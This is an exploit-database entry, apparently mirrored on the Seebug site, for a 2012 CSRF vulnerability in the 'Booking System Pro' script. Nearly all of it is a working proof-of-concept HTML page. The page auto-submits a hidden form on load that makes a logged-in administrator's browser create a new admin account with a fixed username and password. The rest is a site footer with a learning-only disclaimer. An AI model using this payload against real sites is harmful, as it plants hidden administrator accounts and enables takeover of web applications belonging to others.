# Exploit Title: Booking System Pro CSRF Vulnerability # Date: 28/08/2012 # Author: DaOne (@LibyanCA) # Vendor: http://www.neptunescripts.com/products # Price: $39 # CSRF Add Admin <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://[target]/admin/users/add"> <input type="hidden" name="data[User][name]" value="webadmin"/> <input type="hidden" name="data[User][username]" value="webadmin"> <input type="hidden" name="data[User][password]" value="pass123"> <input type="hidden" name="data[User][email]" value="admin@email.com"> <input type="hidden" name="data[User][phone]" value=""/> <input type="hidden" name="data[User][role]" value="admin"/> </form> </body> </html>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论